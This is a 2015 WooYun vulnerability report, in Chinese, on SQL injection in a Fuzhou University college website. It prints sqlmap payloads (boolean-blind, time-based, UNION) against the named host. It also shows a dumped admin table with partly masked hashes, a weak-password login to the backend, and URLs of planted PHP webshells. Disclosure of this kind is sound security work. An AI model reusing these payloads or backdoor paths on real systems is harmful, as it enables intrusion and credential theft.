当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137933

漏洞标题:福州大学某站sql注入

相关厂商:福州大学

漏洞作者: 路人甲

提交时间:2015-09-01 12:54

修复时间:2015-09-06 12:56

公开时间:2015-09-06 12:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-01: 细节已通知厂商并且等待厂商处理中
2015-09-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

小菜鸟只会挖挖学校。。

详细说明:

http://jxxy.fzu.edu.cn/index.php/Index/view/id/4417.html
福州大学机械工程及其自动化学院。
我的专业。。。
随手一个单引号 http://jxxy.fzu.edu.cn/index.php/Index/view/id/4417'.html
没有出现找不到网页,貌似有问题,扔进sqlmap瞧瞧
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://jxxy.fzu.edu.cn:80/index.php/Index/view/id/4417 AND 7297=729
7.html
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://jxxy.fzu.edu.cn:80/index.php/Index/view/id/4417 AND (SELECT
* FROM (SELECT(SLEEP(5)))ERMW).html
Type: UNION query
Title: Generic UNION query (NULL) - 22 columns
Payload: http://jxxy.fzu.edu.cn:80/index.php/Index/view/id/-6357 UNION ALL S
ELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7171,0x674f4d4c4141774f736a,0x7178
7a7871)-- .html
---
[10:08:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
找到管理员账号密码
Database: preem
Table: pe_user
[8 entries]
+---------+--------------------------+
| account | password |
+---------+--------------------------+
| a--in | a0b1d4b26858--c74401f867 |
| jx--b | e10adc3949ba--abbe56e057 |
| ya--zx | e10adc3949ba--abbe56e057 |
| l-j | 70ef6a7faa26--f9a26e28bf |
| x-z | 1c5d1cbee42f--5136ed4274 |
| x-h | 21276dcdd137--a0b62b5fbe |
| x-h | fc4de2db48f6--c41fc19cd5 |
| che--ie | 1fc052562aa5--e8a2467438 |
+---------+--------------------------+
密码加密方式不是md5
找到后台地址试弱口令
http://jxxy.fzu.edu.cn/index.php/Public/logout
万幸,进来了。

火狐截图_2015-08-30T02-51-25.961Z.png


找上传点

无标题_副本.png


不能直接上传php文件,倒是发现了几个后门,后门上传时间是2013年
地址
http://jxxy.fzu.edu.cn//preem/Uploads/111.php
http://jxxy.fzu.edu.cn//preem/Uploads/4e59df9775452.php

漏洞证明:

121

修复方案:

121

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-06 12:56

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-07 15:42 | xiaokong ( 实习白帽子 | Rank:65 漏洞数:18 | 睡觉~)

    @福州大学 呵呵。